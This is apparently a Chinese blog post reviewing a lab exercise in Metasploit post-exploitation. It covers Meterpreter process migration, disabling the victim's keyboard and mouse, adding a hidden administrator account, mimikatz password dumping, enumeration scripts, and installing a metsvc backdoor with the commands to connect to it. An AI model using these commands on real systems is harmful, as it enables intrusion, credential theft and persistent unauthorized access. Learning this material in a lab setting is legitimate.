zoukankan      html  css  js  c++  java
  • 主机渗透复盘总结-后渗透

    总结流程:

         1-ip获取,互相通信
     2-进入接口-msf武器库
     3-挑选武器-exploit模块
     4-装填子弹paypload模块
     5-后渗透meterpreter模块
    

    进程迁移:

    1. 输入 ps 命令 (获取目标机正在运行的进程)

    2. 输入 getpid 命令(查看本机meterpreter shell的进程号)

    3. 将meterpreter进程迁移到受害机稳定的进程内,这里选择进程号为3524的进程

    4. uictl开关键盘/鼠标,顾明思意。disable关;enable开、keybord键盘、mouse鼠标

    5. 关闭它的鼠标,和键盘功能

    6. 受害机的鼠标点击功能失效,键盘输入失效

    7. 查看受害机当前处于的目录

    8. 进行文件上传

    9. 远程连接桌面,添加用户账号 net user apple hkb /add
      添加刚刚创建的用户到管理组 net localgroup administrators apple /add

    10. 远程登录 :rdesktop 192.168.73.129,将上传的文件图标改成桌面程序的图标,然后进行偷换。

    11. mimikatz抓取密码,load mimikatz加载

    12. 获取密码,wdigest

    信息收集:常用脚本

    run post/windows/gather/checkvm #是否虚拟机
    run post/linux/gather/checkvm #是否虚拟机
    run post/windows/gather/forensics/enum_drives #查看分区
    run post/windows/gather/enum_applications #获取安装软件信息
    run post/windows/gather/dumplinks #获取最近的文件操作
    run post/windows/gather/enum_ie #获取IE缓存
    run post/windows/gather/enum_chrome #获取Chrome缓存
    run post/windows/gather/enum_patches #补丁信息
    run post/windows/gather/enum_domain #查找域控

    总结:

    进程迁移的重要性,后渗透主要是metaploit工具的使用,思路目的较为重要。
    植入后门·;run metsvc –h # 查看帮助
    run metsvc –A #自动安装后门

    连接后门·;msf > use exploit/multi/handler
    msf > set payload windows/metsvc_bind_tcp
    msf > set RHOST 192.168.159.144
    msf > set LPORT 31337
    msf > exploit

    最后分享后渗透学习网址(后渗透之meterpreter使用攻略):https://xz.aliyun.com/t/2536

    作者:hkb
    本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。
  • 相关阅读:
    vue开发(一)安装
    Ubuntu18.04安装mysql
    使用.NET Framework开发IIS 7.0模块和处理程序拦截请求实现跳转
    Mysql 清空数据后,释放硬盘文件
    依赖注入
    ubuntu 上开发.netcore
    使用python获取微医数据
    Mysql查询某字段重复值并删除重复值
    使用pyinstaller 打包python程序
    堆(heap)和栈(stack)、内存泄漏(memory leak)和内存溢出
  • 原文地址:https://www.cnblogs.com/kbhome/p/12535026.html
Copyright © 2011-2022 走看看